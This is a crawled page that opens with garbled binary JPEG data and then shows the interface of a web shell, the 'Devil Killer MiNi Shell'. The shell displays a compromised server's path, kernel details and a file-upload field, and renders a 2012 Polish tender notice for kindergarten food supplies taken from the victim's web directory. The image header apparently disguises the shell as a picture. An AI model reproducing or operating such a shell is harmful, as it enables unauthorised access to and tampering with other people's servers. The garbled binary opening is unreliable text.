JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120806/286736-N-2012.html

<p class="kh_header"><b>Pniewy: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DLA PRZEDSZKOLA MIŚ W PNIEWACH</b><br>
<b>Numer ogłoszenia: 286736 - 2012; data zamieszczenia: 06.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedszkole "Miś" , ul. Dworcowa 23, 62-045 Pniewy, woj. wielkopolskie, tel. 061 2911216.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jrednostka Organizacyjna Gminy Pniewy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH DLA PRZEDSZKOLA MIŚ W PNIEWACH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> TABELA  A*  WARZYWA I OWOCE Nazwa artykułu Jednostka miary Ilość Marchew luzem kg 60 Pietruszka korzeń kg 50 Rzodkiewka świeża p. pęczek 30 Sałata  szt. 20 Por korzeń kg 30 Cebula biała kg 40 Buraki czerwone kg 80 Seler korzeń kg 60 Jabłka lobo 12 kg op. op. 20 Mandarynki  kg 80 Kiwi luz kg 5 Cytryny	kg 8 Ziemniaki jadalne kg 2000 Kapusta czerwona świeża  kg 40 Kapusta pekińska  szt. 50 Kalafior świeży  szt. 40 Pomidory luz kg  20 Ogórki szklarniowe kg 20 Ogórki kwaszone 3 kg op. kg 15 Kapusta kwaszona kg 60 Kapusta biała główka kg kg   50   Pieczarki świeże luz kg 20 Banan kg 100 Papryka konserwowa 0,9l szt. szt. 15 Ogórki konserwowe 0,9l szt 35 Papryka świeża 	kg 5 Szczypior pęczek 30 Koper świeży pęczek 30 Natka pietruszki p. pęczek 15 TABELA B*  MIĘSO I PRZETWORY Nazwa artykułu  Jedn. miary Ilość Kości od schabu kg 200 Ogonówka wieprzowa wędzona  kg 120 Boczek wędzony wieprz. B k kg	30 Parówka gruba wieprzowa 30%tł. kg 80 Szynka wieprzowa wędzona got. kg 90 Mięso wieprzowe mielone drobne kg 80 Mielonka zapiekana wieprzowa	kg 40 Mięso gulaszowe wieprzowe kg 100 Filet drobiowy z kurczaka kg 160 Żeberka wieprzowe kg	50 Porcje rosołowe z kurczaka kg 20Kiełbasa wieprzowa gruba kg 160 Udka z kurczaka kg 80 Karkówka b k wieprzowa kg 90 Kaszanka kg 60 Kurczak świeży patroszony do 2kg kg 90 Wątróbka wieprzowa kg 60  Parówka drobiowa cienka kg 90 Kotlet schabowy b k kg 45 Pasztet drobiowy kg 60 Smalec luz kg 30 TABELA C*  MROŻONKI Nazwa artykułu  Jednostka miary Ilość Fasolka szparagowa mrożona 450 g op.	szt. 80 Truskawki mrożone 450 g op. szt. 100 Mieszanka warzywna paski 450g op. szt. 150 Brokuły mrożone 5 kg op. szt. 60 Zupa pieczarkowa, 450g op. szt. 100        Zupa kalafiorowa, 450g op. szt.	140 Zupa jarzynowa, 450g op. szt. 120 Kalafior, 450g op. szt. 100 Pyzy drożdżowe op.9szt szt  200   Groszek zielony, 450g op. szt. 80 Marchew z groszkiem, 450g op. szt. 100 Wiśnie drążone 450g op. szt. 10 TABELA D* PRZETWORY MĄCZNE, INNE Nazwa artykułu Jednostka miary Ilość Mąka pszenna 500  kg 200 Ryż długoziarnisty  kg 80 Kawa zbożowa (typu inka)150 g	szt. 15 Kasza jęczmienna średnia luz kg 30 Kasza manna 1kg szt. 15 Kisiel różne smaki 40 g szt. 300 Budyń różne smaki 40 g szt. 300 Fasola czerwona konserwowa 450g op. szt. 15 Cukier biały kryształ, paczkowany 1kg szt. 500 Syrop wieloowocowy, wysokosłodzony 1l szt. 30 Napoje różne smaki 0.20l kartonik szt. 800 Krem do smarowania orzech.-czek. 200g szt. 150 Miód pszczeli nektarowy lipowy 230 g szt. 80 Dżemy różne smaki 0,90 l szt. 60 Kakao naturalne 200 g op. szt. 4 Majonez dekoracyjny 0,7 kg op.  szt. 30 Musztarda sarepska 0,9 kg op. szt. 3 Płatki kukurydziane 250 g op. szt. 60 Groch połówki luz 5 kg op. szt. 8 Fasola sucha luz kg szt. 30 Koncentrat  pomidorowy 30% 0,9 l  szt. 50 Galaretka różne smaki 0,75g szt 240 Proszek do pieczenia 36g szt. 30 Drożdże piekarskie 100g szt. 60 Ketchup łagodny 500g szt.  5 Ocet spirytusowy 10%, 0,5l szt. 20 Sól 1kg szt. 60 Liść laurowy 10g szt. 30 Cukier waniliowy 32g szt. 60 Cukier puder 0,5kg szt. 40 Kwasek cytrynowy spożywczy 20g szt. 30 Rodzynki 200g szt. 5 Papryka konserwowa 0,9l szt. 20 Ananas puszka plastry, 0,58 kg szt. 30 Brzoskwinia puszka połówki, 850dkg szt. 30 Kukurydza konserwowa 400 ml	szt. 20 Groszek zielony puszka 400ml szt. 20 Przecier ogórkowy 0,5 kg op. szt. 50 Cynamon 20 g szt. 20 Ziele angielskie 100g szt. 30 Mąka ziemniaczana 1kg kg 5 Olej roślinny, 1l  szt. 120 Szprot w pomidorach puszka  170g op.	szt. 40 Paprykarz szczecinecki 135g op. szt. 80 TABELA E* SŁODYCZE Nazwa artykułu	Jedn. miary Ilość Cukierki mieszane czekolad 2,5kg op. szt. 5 Wafle nadziewane w czekoladzie 28g (typu: Grześki) 30 szt op display	szt. 10 Wafle kakaowe  b czekolady (typu:Grześki) 30 szt op display szt. 20 Wafle śmietankowe 3,2 kg op. szt. 3 Biszkopty 120g op. szt. 100 Baton mleczny 23,5g 30szt op display szt. 20 Draże różne smaki 100g op. szt. 250 Batoniki nadziewane masą w mlecznej czekoladzie różne smaki 45g  24szt. op.	szt. 10 Figurki czekoladowe -mikołaje szt. 280 TABELA F* PIECZYWO Nazwa artykułu Jedn. miary Ilość Chleb baltonowski krojony 0,6 kg szt. 1600 Chleb razowy 0,5 kg litewski szt. 400 Bułka firmowa  0,06 kg szt. 3500 Bułka maślana 0,05 kg	szt. 2500 Chleb pszenny 0,35 kg szt. 600 Drożdżówki szt. 500 Bułka tarta 1 kg szt. 50 Babka okrągła średnia 0,5kg szt. 50  TABELA G*  NABIAŁ  Nazwa artykułu Jednostka miary Ilość Śmietana 12% słodka 0,5l  kartonik szt. 130 Śmietana zakwaszana 12% 180g szt. 50 Twaróg półtłusty 250 g op. szt. 400 Ser homogenizowany  tłusty 200 g  szt. 70 Ser salami luz kg 60 Sery topione bloczki 100g op. różne smaki szt. 180 Jajka kurze świeże średnie   szt. 1800 Mleko 2% folia 0,9l op. szt. 1200 Serdelek topiony kiełbaski 100g szt. 150 Ser kanapkowy 150g op. szt. 150 Ser królewski luz kg 50 Maślanka naturalna, karton  1l  PL28101601 WE szt. 50 Jogurt naturalny 0,45l op. szt. 10 Jogurt smakowy 125g szt. 1200 Śmietanka kremowa 36% 0,5l szt. 20 Margaryna zwykła 250g  szt. 220 Masło śmietankowe 200g op. zaw. 86%tł. szt. 1700 TABELA H* MAKARONY I PRZYPRAWY Nazwa artykułu Jednostka miary Ilość Sos pieczeniowy 3kg op. szt. 2 Majeranek 0,25kg op. szt. 5 Delikat do mięs i innych potraw 600g op.  szt. 3 Delikat do drobiu 600g op. szt. 3 Delikat do mięs 4,8 kg op. szt. 1 Delikat do ryb 600g op. szt. 1 Przyprawa szefa kuchni 1kg op. szt. 5 Makaron świderki, 100% pszenicy Durum 3kgop. szt.27Makaron nitki 100% pszenicy Durum 3kgop. szt.5 Makaron rurki 100% pszenicy Durum 3kgop. szt.6 Makaron koła 100% pszenicy Durum 3kgop. szt.27 Makaron łazanki 100% pszenicy Durum 3kgop. szt.18 Makaron kokardki 100% pszenicy Durum 3kgop. szt.27 Napoj 1kg mix  szt. 100 Sos myśliwski 1,1 kg op. szt 2 Herbata granulowana 0,9 kg op. szt. 60Papryka słodka syp. 0,5kgszt.2 Pieprz mielony 0,5 kg szt. 3 Przyprawa w płynie 1l szt.3  TABELA  I*  RYBY Nazwa towaru Jednostka miary Ilość Ryby mrożone filet z Pangi kg op. kg 60 Ryby mrożone filet z mintaja kg op. kg 60 Ryby wiadro płaty śledziowe ocet 2,5 kgop.szt.4.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>WEDŁUG ZAPOTRZEBOWANIA</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zzamówienia moga ubiegać się wykonawcy, którzy spełniają warunki wynikające z art. 22 ust 1 - 3 ustawy z dnia 29 stycznia 2004 PZP oraz nie podlegaja wykluczeniu na podstawie art. 24 ust 1-2 ustawy, złożą wymaganre i opisane w SIWZ oświadczenia i dokumenty. Informacja o oświadczeniach i dokumentach  jakie mają dostarczyć wykonawcy  w celu potwierdzenia spełnienia warunków udziału w postępowaniu. W celu potwierdzenia spełnienia warunków Oferenci zobowiązani są do przedstawienia w ofercie następujących dokumentów i oświadczeń: Wypełniony formularz oferty dla danej tabeli. Oświadczenie o spełnianiu warunków określonych  w art. 22 ust. 1 oraz art. 24 ust. 1-2 ustawy (załącznik nr 2), aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji  działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy  przed upływem terminu składania ofert  (oryginał lub kopia poświadczona za zgodność z orginałem  przez wykonawcę). W przypadku występowania pełnomocnika należy dołączyć pełnomocnictwo dla osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lubinnych dokumentów. Dokumenty stanowiące załączniki wymagane przez niniejsze SIWZ muszą zostać wypełnione przez oferenta bez wyjątku ściśle według warunków i postanowień w nich zawartych - bez dokonywania żadnych zmian i uzupełnień. Miejsca wykropkowane przeznaczone do wypełnienia muszą zostać prawidłowo wypełnione.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przedszkole-mis.pniewy.org<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Przedszkole Miś Ul. Dworcowa 23, 62-045 Pniewy, biuro intendenta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2012 godzina 09:00, miejsce: siedziba Zamawiającego, na parterze biuro Dyrektora.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 16.09.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> TABELA  A*  WARZYWA I OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu Jednostka miary Ilość Marchew luzem kg 60 Pietruszka korzeń kg 50 Rzodkiewka świeża p. pęczek 30 Sałata  szt. 20 Por korzeń kg 30 Cebula biała kg 40 Buraki czerwone kg 80 Seler korzeń kg 60 Jabłka lobo 12 kg op. op. 20 Mandarynki  kg 80 Kiwi luz kg 5 Cytryny	kg 8 Ziemniaki jadalne kg 2000 Kapusta czerwona świeża  kg 40 Kapusta pekińska  szt. 50 Kalafior świeży  szt. 40 Pomidory luz kg  20 Ogórki szklarniowe kg 20 Ogórki kwaszone 3 kg op. kg 15 Kapusta kwaszona kg 60 Kapusta biała główka kg kg   50   Pieczarki świeże luz kg 20 Banan kg 100 Papryka konserwowa 0,9l szt. szt. 15 Ogórki konserwowe 0,9l szt 35 Papryka świeża 	kg 5 Szczypior pęczek 30 Koper świeży pęczek 30 Natka pietruszki p. pęczek 15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> TABELA B*  MIĘSO I PRZETWORY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu  Jedn. miary Ilość Kości od schabu kg 200 Ogonówka wieprzowa wędzona  kg 120 Boczek wędzony wieprz. B k kg	30 Parówka gruba wieprzowa 30%tł. kg 80 Szynka wieprzowa wędzona got. kg 90 Mięso wieprzowe mielone drobne kg 80 Mielonka zapiekana wieprzowa	kg 40 Mięso gulaszowe wieprzowe kg 100 Filet drobiowy z kurczaka kg 160 Żeberka wieprzowe kg	50 Porcje rosołowe z kurczaka kg 20Kiełbasa wieprzowa gruba kg 160 Udka z kurczaka kg 80 Karkówka b k wieprzowa kg 90 Kaszanka kg 60 Kurczak świeży patroszony do 2kg kg 90 Wątróbka wieprzowa kg 60  Parówka drobiowa cienka kg 90 Kotlet schabowy b k kg 45 Pasztet drobiowy kg 60 Smalec luz kg 30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> TABELA C*  MROŻONKI.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu  Jednostka miary Ilość Fasolka szparagowa mrożona 450 g op.	szt. 80 Truskawki mrożone 450 g op. szt. 100 Mieszanka warzywna paski 450g op. szt. 150 Brokuły mrożone 5 kg op. szt. 60 Zupa pieczarkowa, 450g op. szt. 100        Zupa kalafiorowa, 450g op. szt.	140 Zupa jarzynowa, 450g op. szt. 120 Kalafior, 450g op. szt. 100 Pyzy drożdżowe op.9szt szt  200   Groszek zielony, 450g op. szt. 80 Marchew z groszkiem, 450g op. szt. 100 Wiśnie drążone 450g op. szt. 10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> TABELA D* PRZETWORY MĄCZNE, INNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Nazwa artykułu Jednostka miary Ilość Mąka pszenna 500  kg 200 Ryż długoziarnisty  kg 80 Kawa zbożowa (typu inka)150 g	szt. 15 Kasza jęczmienna średnia luz kg 30 Kasza manna 1kg szt. 15 Kisiel różne smaki 40 g szt. 300 Budyń różne smaki 40 g szt. 300 Fasola czerwona konserwowa 450g op. szt. 15 Cukier biały kryształ, paczkowany 1kg szt. 500 Syrop wieloowocowy, wysokosłodzony 1l szt. 30 Napoje różne smaki 0.20l kartonik szt. 800 Krem do smarowania orzech.-czek. 200g szt. 150 Miód pszczeli nektarowy lipowy 230 g szt. 80 Dżemy różne smaki 0,90 l szt. 60 Kakao naturalne 200 g op. szt. 4 Majonez dekoracyjny 0,7 kg op.  szt. 30 Musztarda sarepska 0,9 kg op. szt. 3 Płatki kukurydziane 250 g op. szt. 60 Groch połówki luz 5 kg op. szt. 8 Fasola sucha luz kg szt. 30 Koncentrat  pomidorowy 30% 0,9 l  szt. 50 Galaretka różne smaki 0,75g szt 240 Proszek do pieczenia 36g szt. 30 Drożdże piekarskie 100g szt. 60 Ketchup łagodny 500g szt.  5 Ocet spirytusowy 10%, 0,5l szt. 20 Sól 1kg szt. 60 Liść laurowy 10g szt. 30 Cukier waniliowy 32g szt. 60 Cukier puder 0,5kg szt. 40 Kwasek cytrynowy spożywczy 20g szt. 30 Rodzynki 200g szt. 5 Papryka konserwowa 0,9l szt. 20 Ananas puszka plastry, 0,58 kg szt. 30 Brzoskwinia puszka połówki, 850dkg szt. 30 Kukurydza konserwowa 400 ml	szt. 20 Groszek zielony puszka 400ml szt. 20 Przecier ogórkowy 0,5 kg op. szt. 50 Cynamon 20 g szt. 20 Ziele angielskie 100g szt. 30 Mąka ziemniaczana 1kg kg 5 Olej roślinny, 1l  szt. 120 Szprot w pomidorach puszka  170g op.	szt. 40 Paprykarz szczecinecki 135g op. szt. 80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 03.20.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> TABELA E* SŁODYCZE.</p>
